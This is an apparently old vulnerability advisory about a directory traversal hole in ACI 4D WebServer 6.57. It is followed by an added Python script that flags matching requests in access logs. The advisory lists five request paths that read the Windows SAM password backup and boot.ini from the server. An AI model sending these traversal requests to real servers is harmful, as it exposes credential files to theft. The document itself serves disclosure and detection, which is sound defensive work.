COMMAND
ACI 4D WebServer
SYSTEMS AFFECTED
ACI 4D WebServer 6.57 (at least)
PROBLEM
'KF' found the following. This directory traversal hole seems to
work on the ACI 4D WebServer running on the NT platform. One would
imagine exploitation on a Mac OS box would be similar but would
require the proper Mac filesystem path to the file you wish to
view. Exploit:
http://host + one of the following URLs.
- /4DBin/_/C:/winnt/repair/sam._
- /4DBin/_/../winnt/repair/sam._
- /4DBin/_/C:/inetpub/../boot.ini
- /4DBin/_/../boot.ini
- /4DBin/_/../inetpub/../boot.ini
SOLUTION
Nothing yet.
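With no fix available, requests of the shape listed under PROBLEM can at least be flagged in the web server's access log. The script below is an added example, not part of the original advisory or of any vendor code. It assumes Common Log Format and uses a constructed sample log, and it goes slightly beyond the five listed URLs by normalizing percent-encoding and backslashes before checking.

```python
import re
from urllib.parse import unquote

PREFIX = "/4dbin/"                      # directory named in the advisory
DRIVE = re.compile(r"^[a-z]:$")         # a bare drive-letter path segment
REQUEST = re.compile(r'"(?:GET|HEAD|POST) (\S+)')

def decode(path, rounds=3):
    # Undo a few layers of percent-encoding so the checks see literal text.
    for _ in range(rounds):
        nxt = unquote(path)
        if nxt == path:
            break
        path = nxt
    return path

def classify(request_path):
    """Return the reasons a path is suspicious; an empty list means clean."""
    path = decode(request_path.split("?", 1)[0]).replace("\\", "/")
    if not path.lower().startswith(PREFIX):
        return []
    segments = [s for s in path.split("/") if s]
    reasons = []
    if ".." in segments:
        reasons.append("dot-dot segment")
    if any(DRIVE.match(s.lower()) for s in segments):
        reasons.append("drive-letter segment")
    return reasons

def scan(log_lines):
    # Assumption: the request line is the first quoted field (Common Log Format).
    hits = []
    for line in log_lines:
        m = REQUEST.search(line)
        if m and (why := classify(m.group(1))):
            hits.append((m.group(1), why))
    return hits

# Constructed sample log; addresses are from the documentation range.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2002:10:00:00 +0000] "GET /index.html HTTP/1.0" 200 1043',
    '192.0.2.77 - - [01/Jan/2002:10:00:05 +0000] "GET /4DBin/_/../boot.ini HTTP/1.0" 200 288',
    '192.0.2.77 - - [01/Jan/2002:10:00:09 +0000] "GET /4DBin/_/C:/winnt/repair/sam._ HTTP/1.0" 200 9021',
    '192.0.2.10 - - [01/Jan/2002:10:00:12 +0000] "GET /4DBin/page.html HTTP/1.0" 200 512',
]

if __name__ == "__main__":
    for path, why in scan(SAMPLE_LOG):
        print(f"{path}: {', '.join(why)}")
```

A 200 status on a flagged line, as in the constructed sample, indicates the file was actually served and should be treated as a disclosure.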